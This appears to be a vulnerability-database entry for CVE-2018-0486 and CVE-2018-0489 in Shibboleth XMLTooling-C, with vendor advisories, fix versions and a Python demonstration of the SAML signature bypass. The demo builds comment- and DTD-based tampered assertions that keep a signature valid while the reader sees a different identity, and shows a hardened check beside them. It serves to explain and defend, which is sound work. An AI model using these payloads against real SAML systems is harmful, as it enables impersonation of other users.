CVE-2018-0486
Published: 2018-01-13
Priority: P429 · medium · CVSS 3.0 base score 6.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
EPSS: 1.52% (71.4th percentile)
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | clearpass | 6.6.0 – 6.6.9 | — |
| arubanetworks | clearpass | >= 6.7.0 < 6.7.2 | 6.7.2 |
| debian | debian_linux | — | — |
| debian | xmltooling | < 1.6.3-1 | 1.6.3-1 (bookworm) |
| debian | xmltooling | < 1.6.4-1 | 1.6.4-1 (bookworm) |
| shibboleth | xmltooling-c | < 1.6.3 | 1.6.3 |
| shibboleth | xmltooling-c | < 1.6.4 | 1.6.4 |
| xmltooling_project | xmltooling | >= 0 < 1.6.3-1 | 1.6.3-1 |
| xmltooling_project | xmltooling | >= 0 < 1.6.4-1 | 1.6.4-1 |

The 1.6.4 and 1.6.4-1 rows belong to the follow-up CVE-2018-0489, issued because the 1.6.3 fix for this CVE was incomplete; a deployment is only clear of both issues at 1.6.4 (Shibboleth SP 2.6.1.4) or later.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 6.5 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N |
| nvd | 2.0 | 6.4 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:P/A:N |
| osv | — | 6.5 | MEDIUM | — |
| vendor_debian | — | 6.5 | MEDIUM | — |
| vendor_redhat | — | 6.5 | MEDIUM | — |
Red Hat
CVE-2018-0489 [MEDIUM] CWE-287 · openSAML: Mishandling of comments in SAML content can lead to bypass of signature verification
vendor_redhat · 2018-02-27 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
Package: opensaml-core (Red Hat JBoss Enterprise Application Platform 6) - Not affected
Package: opensaml-core (Red Hat JBoss Enterprise Application Platform 7) - Not affected
Red Hat
CVE-2018-0486 [MEDIUM] CWE-287 · xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
vendor_redhat · 2018-01-12 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Package: xmltooling (Red Hat JBoss Data Grid 6) - Not affected
Package: xmltooling (Red Hat JBoss Data Virtualization 6) - Not affected
Package: xmltooling (Red Hat JBoss Enterprise Application Platform 6) - Not affected
Package: xmltooling (Red Hat JBoss Fuse 6) - Not affected
Package: xmltooling (Red Hat JBoss Fuse Service Works 6) - Not affected
Package: XMLTooling (Red Hat JBoss Operatio
Debian
CVE-2018-0486 [MEDIUM] · xmltooling
vendor_debian · 2018 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
Scope: local
bookworm: resolved (fixed in 1.6.3-1)
bullseye: resolved (fixed in 1.6.3-1)
forky: resolved (fixed in 1.6.3-1)
sid: resolved (fixed in 1.6.3-1)
trixie: resolved (fixed in 1.6.3-1)
Debian
CVE-2018-0489 [MEDIUM] · xmltooling
vendor_debian · 2018 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
Scope: local
bookworm: resolved (fixed in 1.6.4-1)
bullseye: resolved (fixed in 1.6.4-1)
forky: resolved (fixed in 1.6.4-1)
sid: resolved (fixed in 1.6.4-1)
trixie: resolved (fixed in 1.6.4-1)
GHSA
GHSA-4479-q654-wmq5 · CVE-2018-0489 [MEDIUM] CWE-347
ghsa_unreviewed · 2022-05-14 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
GHSA
GHSA-34v3-mf7p-7v76 · CVE-2018-0486 [MEDIUM] CWE-347
ghsa_unreviewed · 2022-05-14
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
OSV
CVE-2018-0489 [MEDIUM]
osv · 2018-02-27 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.4, as used in Shibboleth Service Provider before 2.6.1.4 on Windows and other products, mishandles digital signatures of user data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via crafted XML data. NOTE: this issue exists because of an incomplete fix for CVE-2018-0486.
OSV
CVE-2018-0486 [MEDIUM]
osv · 2018-01-13 · CVSS 6.5
Shibboleth XMLTooling-C before 1.6.3, as used in Shibboleth Service Provider before 2.6.0 on Windows and other products, mishandles digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
No detection rules found.
No public exploits indexed.
Bugzilla
CVE-2018-0486 [MEDIUM] · CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD [fedora-all]
bugzilla · 2018-01-15 · CVSS 6.5
This is an automatically created tracking bug! It was created to ensure that one or more security vulnerabilities are fixed in affected versions of fedora-all.

For comments that are specific to the vulnerability please use bugs filed against the "Security Response" product referenced in the "Blocks" field.

For more information see: http://fedoraproject.org/wiki/Security/TrackingBugs

When submitting as an update, use the fedpkg template provided in the next comment(s). This will include the bug IDs of this tracking bug as well as the relevant top-level CVE bugs.

Please also mention the CVE IDs being fixed in the RPM changelog and the fedpkg commit mes
Bugzilla
CVE-2018-0486 [MEDIUM] · CVE-2018-0486 xmltooling: impersonation attack and sensitive information disclosure in the Service Provider via crafted DTD
bugzilla · 2018-01-15 · CVSS 6.5
A flaw was found in Shibboleth XMLTooling-C. Versions before 1.6.3 mishandle digital signatures of user attribute data, which allows remote attackers to obtain sensitive information or conduct impersonation attacks via a crafted DTD.
The Service Provider software relies on a generic XML parser to process SAML responses and there are limitations in older versions of the parser that make it impossible to fully disable Document Type Definition (DTD) processing. Through addition/manipulation of a DTD, it's possible to make changes to an XML document that do not break a digital signature but are mishandled by the SP and its libraries. These manipulations can alter the u
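The mechanism in the excerpt above is a split-text-node bug: a comment or an entity reference inside an element's content ends one text node and starts another, the canonical form that the signature covers joins them back together (and carries neither comments nor the DTD), but application code that reads only the first text node sees a truncated value. The Python script below is an added illustration of that class and is not xmltooling or Shibboleth SP code. It assumes a constructed minimal assertion, an expat-driven tree builder that keeps the text chunks on either side of a boundary as separate nodes (as a full DOM such as Xerces-C does), a simplified canonicalizer in place of C14N, and HMAC-SHA256 with a constructed key in place of the IdP's XML-DSig signature. The comment variant follows the CVE-2018-0489 summary in the Red Hat entry above; the DTD variant follows the CVE-2018-0486 description.

```python
"""Split-text-node signature bypass, the bug class behind CVE-2018-0486
(DTD/entity variant) and CVE-2018-0489 (comment variant).

Added example, not xmltooling or Shibboleth SP code. The tree builder
mimics a DOM that keeps the text on either side of an entity reference or
comment as separate nodes; HMAC-SHA256 over a simplified canonical form
stands in for the XML-DSig signature over C14N output. All documents and
the key are constructed for the demo.
"""
import hashlib
import hmac
import xml.parsers.expat
from xml.sax.saxutils import escape

KEY = b"constructed stand-in for the IdP signing key"


class Element:
    def __init__(self, tag, attrs):
        self.tag = tag
        self.attrs = attrs
        self.children = []  # Element, or ("text" | "comment", str)


def parse(doc, reject_doctype=False):
    """Build a tree from expat events without merging adjacent text chunks."""
    parser = xml.parsers.expat.ParserCreate()
    parser.buffer_text = False  # deliver character data exactly as expat splits it
    root, stack = None, []

    def start(tag, attrs):
        nonlocal root
        elem = Element(tag, attrs)
        if stack:
            stack[-1].children.append(elem)
        else:
            root = elem
        stack.append(elem)

    def doctype(name, sysid, pubid, has_internal_subset):
        if reject_doctype:  # hardened mode: never let a DTD near signed content
            raise ValueError("DOCTYPE not allowed in signed SAML content")

    parser.StartElementHandler = start
    parser.EndElementHandler = lambda tag: stack.pop()
    parser.CharacterDataHandler = lambda data: stack[-1].children.append(("text", data))
    parser.CommentHandler = lambda data: stack[-1].children.append(("comment", data))
    parser.StartDoctypeDeclHandler = doctype
    parser.Parse(doc, True)
    return root


def canonical(elem):
    """Simplified C14N: no DOCTYPE, attributes sorted, comments dropped,
    entity references already expanded, text on both sides of a boundary joined."""
    attrs = "".join(' %s="%s"' % (k, escape(v, {'"': "&quot;"}))
                    for k, v in sorted(elem.attrs.items()))
    body = "".join(canonical(c) if isinstance(c, Element)
                   else escape(c[1]) if c[0] == "text" else ""
                   for c in elem.children)
    return "<%s%s>%s</%s>" % (elem.tag, attrs, body, elem.tag)


def signature(tree):
    return hmac.new(KEY, canonical(tree).encode(), hashlib.sha256).hexdigest()


def find(elem, tag):
    if elem.tag == tag:
        return elem
    for child in elem.children:
        if isinstance(child, Element):
            hit = find(child, tag)
            if hit is not None:
                return hit
    return None


def text_nodes(elem):
    return [c[1] for c in elem.children if not isinstance(c, Element) and c[0] == "text"]


def name_id_vulnerable(tree):
    """The bug class: read only the first text node of NameID."""
    return text_nodes(find(tree, "NameID"))[0]


def name_id_hardened(tree):
    """Join every text node, so a comment or entity boundary cannot truncate the value."""
    return "".join(text_nodes(find(tree, "NameID")))


def assertion(name_id_markup, prolog=""):
    """Constructed minimal SAML-like assertion; name_id_markup is inserted unescaped."""
    return (prolog + '<Assertion ID="a1" Version="2.0"><Subject><NameID Format="email">'
            + name_id_markup + "</NameID></Subject></Assertion>").encode()


# The attacker owns "admin@example.com.attacker.test" and gets it legitimately signed.
ORIGINAL = assertion("admin@example.com.attacker.test")
ISSUED_SIG = signature(parse(ORIGINAL))

# CVE-2018-0489 class: a comment splits the NameID text right after the victim's identity.
COMMENT_TAMPER = assertion("admin@example.com<!---->.attacker.test")
# CVE-2018-0486 class: a DTD-declared entity does the same; the DTD is outside the signature.
DTD_TAMPER = assertion("admin@example.com&dot;attacker.test",
                       prolog='<!DOCTYPE Assertion [<!ENTITY dot ".">]>')


def sp_outcome(doc, hardened=False):
    """(signature_valid, name_id) as the SP sees it, or None if the document is rejected."""
    try:
        tree = parse(doc, reject_doctype=hardened)
    except ValueError:
        return None
    valid = hmac.compare_digest(signature(tree), ISSUED_SIG)
    return valid, (name_id_hardened if hardened else name_id_vulnerable)(tree)


if __name__ == "__main__":
    for label, doc in [("original", ORIGINAL), ("comment", COMMENT_TAMPER), ("dtd", DTD_TAMPER)]:
        print(label, "vulnerable SP:", sp_outcome(doc), "hardened SP:", sp_outcome(doc, True))
```

Run as a script, the vulnerable path reports the signature as valid for both tampered documents yet hands the application `admin@example.com`. The hardened path changes two things: it refuses any document carrying a DOCTYPE instead of relying on the parser to disable DTD processing (which the excerpt says older parsers could not fully do), and it joins all text nodes before using the value, so the comment variant still verifies and yields the full NameID.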
References
http://www.securitytracker.com/id/1040177
https://lists.debian.org/debian-lts-announce/2018/01/msg00016.html
https://lists.debian.org/debian-security-announce/2018/msg00007.html
https://shibboleth.net/community/advisories/secadv_20180112.txt
https://www.debian.org/security/2018/dsa-4085
Published: 2018-01-13